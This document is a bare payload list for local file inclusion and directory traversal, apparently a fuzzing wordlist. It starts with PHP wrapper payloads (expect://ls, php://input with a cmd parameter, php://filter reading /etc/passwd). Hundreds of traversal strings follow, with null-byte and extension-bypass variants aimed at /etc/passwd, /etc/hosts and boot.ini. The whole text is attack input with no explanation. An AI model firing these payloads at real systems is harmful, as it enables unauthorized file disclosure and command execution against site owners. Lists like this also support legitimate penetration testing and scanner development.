expect://ls
php://input&cmd=ls
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/resource=/etc/passwd
/etc/passwd%00
/etc/passwd%2500
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
/etc/passwd%00.
../etc/passwd%00.
../../etc/passwd%00.
../../../etc/passwd%00.
../../../../etc/passwd%00.
../../../../../etc/passwd%00.
../../../../../../etc/passwd%00.
../../../../../../../etc/passwd%00.
../../../../../../../../etc/passwd%00.
../../../../../../../../../etc/passwd%00.
../../../../../../../../../../etc/passwd%00.
../../../../../../../../../../../etc/passwd%00.
/etc/passwd.html
../etc/passwd.html
../../etc/passwd.html
../../../etc/passwd.html
../../../../etc/passwd.html
../../../../../etc/passwd.html
../../../../../../etc/passwd.html
../../../../../../../etc/passwd.html
../../../../../../../../etc/passwd.html
../../../../../../../../../etc/passwd.html
../../../../../../../../../../etc/passwd.html
../../../../../../../../../../../etc/passwd.html
/etc/hosts
../etc/hosts
../../etc/hosts
../../../etc/hosts
../../../../etc/hosts
../../../../../etc/hosts
../../../../../../etc/hosts
../../../../../../../etc/hosts
../../../../../../../../etc/hosts
../../../../../../../../../etc/hosts
../../../../../../../../../../etc/hosts
../../../../../../../../../../../etc/hosts
/etc/hosts%00
../etc/hosts%00
../../etc/hosts%00
../../../etc/hosts%00
../../../../etc/hosts%00
../../../../../etc/hosts%00
../../../../../../etc/hosts%00
../../../../../../../etc/hosts%00
../../../../../../../../etc/hosts%00
../../../../../../../../../etc/hosts%00
../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../etc/hosts%00
/etc/hosts%00.
../etc/hosts%00.
../../etc/hosts%00.
../../../etc/hosts%00.
../../../../etc/hosts%00.
../../../../../etc/hosts%00.
../../../../../../etc/hosts%00.
../../../../../../../etc/hosts%00.
../../../../../../../../etc/hosts%00.
../../../../../../../../../etc/hosts%00.
../../../../../../../../../../etc/hosts%00.
../../../../../../../../../../../etc/hosts%00.
/etc/hosts.html
../etc/hosts.html
../../etc/hosts.html
../../../etc/hosts.html
../../../../etc/hosts.html
../../../../../etc/hosts.html
../../../../../../etc/hosts.html
../../../../../../../etc/hosts.html
../../../../../../../../etc/hosts.html
../../../../../../../../../etc/hosts.html
../../../../../../../../../../etc/hosts.html
../../../../../../../../../../../etc/hosts.html
/C:\boot.ini
../C:\boot.ini
../../C:\boot.ini
../../../C:\boot.ini
../../../../C:\boot.ini
../../../../../C:\boot.ini
../../../../../../C:\boot.ini
../../../../../../../C:\boot.ini
../../../../../../../../C:\boot.ini
../../../../../../../../../C:\boot.ini
../../../../../../../../../../C:\boot.ini
../../../../../../../../../../../C:\boot.ini
/\boot.ini
../\boot.ini
../../\boot.ini
../../../\boot.ini
../../../../\boot.ini
../../../../../\boot.ini
../../../../../../\boot.ini
../../../../../../../\boot.ini
../../../../../../../../\boot.ini
../../../../../../../../../\boot.ini
../../../../../../../../../../\boot.ini
../../../../../../../../../../../\boot.ini
\boot.ini
..\boot.ini
..\..\boot.ini
..\..\..\boot.ini
..\..\..\..\boot.ini
..\..\..\..\..\boot.ini
..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\..\boot.ini
/boot.ini
../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini
../../../../../../../../../boot.ini
../../../../../../../../../../boot.ini
../../../../../../../../../../../boot.ini
/C:\boot.ini%00
../C:\boot.ini%00
../../C:\boot.ini%00
../../../C:\boot.ini%00
../../../../C:\boot.ini%00
../../../../../C:\boot.ini%00
../../../../../../C:\boot.ini%00
../../../../../../../C:\boot.ini%00
../../../../../../../../C:\boot.ini%00
../../../../../../../../../C:\boot.ini%00
../../../../../../../../../../C:\boot.ini%00
../../../../../../../../../../../C:\boot.ini%00
/\boot.ini%00
../\boot.ini%00
../../\boot.ini%00
../../../\boot.ini%00
../../../../\boot.ini%00
../../../../../\boot.ini%00
../../../../../../\boot.ini%00
../../../../../../../\boot.ini%00
../../../../../../../../\boot.ini%00
../../../../../../../../../\boot.ini%00
../../../../../../../../../../\boot.ini%00
../../../../../../../../../../../\boot.ini%00
\boot.ini%00
..\boot.ini%00
..\..\boot.ini%00
..\..\..\boot.ini%00
..\..\..\..\boot.ini%00
..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
/boot.ini%00
../boot.ini%00
../../boot.ini%00
../../../boot.ini%00
../../../../boot.ini%00
../../../../../boot.ini%00
../../../../../../boot.ini%00
../../../../../../../boot.ini%00
../../../../../../../../boot.ini%00
../../../../../../../../../boot.ini%00
../../../../../../../../../../boot.ini%00
../../../../../../../../../../../boot.ini%00
/C:\boot.ini%00.
../C:\boot.ini%00.
../../C:\boot.ini%00.
../../../C:\boot.ini%00.
../../../../C:\boot.ini%00.
../../../../../C:\boot.ini%00.
../../../../../../C:\boot.ini%00.
../../../../../../../C:\boot.ini%00.
../../../../../../../../C:\boot.ini%00.
../../../../../../../../../C:\boot.ini%00.
../../../../../../../../../../C:\boot.ini%00.
../../../../../../../../../../../C:\boot.ini%00.
/\boot.ini%00.
../\boot.ini%00.
../../\boot.ini%00.
../../../\boot.ini%00.
../../../../\boot.ini%00.
../../../../../\boot.ini%00.
../../../../../../\boot.ini%00.
../../../../../../../\boot.ini%00.
../../../../../../../../\boot.ini%00.
../../../../../../../../../\boot.ini%00.
../../../../../../../../../../\boot.ini%00.
../../../../../../../../../../../\boot.ini%00.
\boot.ini%00.
..\boot.ini%00.
..\..\boot.ini%00.
..\..\..\boot.ini%00.
..\..\..\..\boot.ini%00.
..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.
/boot.ini%00.
../boot.ini%00.
../../boot.ini%00.
../../../boot.ini%00.
../../../../boot.ini%00.
../../../../../boot.ini%00.
../../../../../../boot.ini%00.
../../../../../../../boot.ini%00.
../../../../../../../../boot.ini%00.
../../../../../../../../../boot.ini%00.
../../../../../../../../../../boot.ini%00.
../../../../../../../../../../../boot.ini%00.
/etc/etc/passwd%00
/etc/etc/passwd%00.
../etc../etc/passwd%00
../../etc../../etc/passwd%00.
../../../etc../../../etc/passwd%00
../../../../etc../../../../etc/passwd%00
../etc../etc/passwd%00.
../../etc../../etc/passwd%00.
../../../etc../../../etc/passwd%00.
../../../../etc../../../../etc/passwd%00.
